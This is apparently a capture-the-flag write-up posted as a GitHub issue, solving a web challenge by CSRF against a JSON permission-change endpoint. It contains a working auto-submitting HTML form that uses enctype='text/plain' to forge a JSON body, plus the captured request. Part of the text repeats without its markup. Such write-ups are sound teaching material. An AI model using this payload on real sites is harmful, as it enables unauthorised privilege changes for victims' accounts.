Open aszx87410 opened 2 years ago
You can login with any username, and then there is a page to change permission: http://124.71.205.122:10002/change.php
The request looks like this, it's in JSON format:
POST /changeapi.php HTTP/1.1 Host: 124.71.205.122:10002 Content-Length: 19 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Content-Type: application/json; charset=UTF-8 Origin: http://124.71.205.122:10002 Referer: http://124.71.205.122:10002/change.php Accept-Encoding: gzip, deflate Cookie: PHPSESSID=1ab6387f551b235d26d1c88a3685d752 Connection: close {"username":"huli"}
There is also a bot, you can send it any link so we can do CSRF here via <form> and enctype="text/plain", like this:
<form>
enctype="text/plain"
<body> <form id=a action="http://124.71.205.122:10002/changeapi.php" method="POST" enctype="text/plain"> <input name='{"username":"fweewfwef", "abc":"' value='123"}'> </form> <script> a.submit() </script> </body>
The form above will send request with body {"username":"fweewfwef", "abc":"=123"}, and content type text/plain. The server did not check the content type so it's fine.
{"username":"fweewfwef", "abc":"=123"}
text/plain
After updating the permission, just visit home.php and get the flag.
You can login with any username, and then there is a page to change permission: http://124.71.205.122:10002/change.php
The request looks like this, it's in JSON format:
There is also a bot, you can send it any link so we can do CSRF here via
<form>
andenctype="text/plain"
, like this:The form above will send request with body
{"username":"fweewfwef", "abc":"=123"}
, and content typetext/plain
. The server did not check the content type so it's fine.After updating the permission, just visit home.php and get the flag.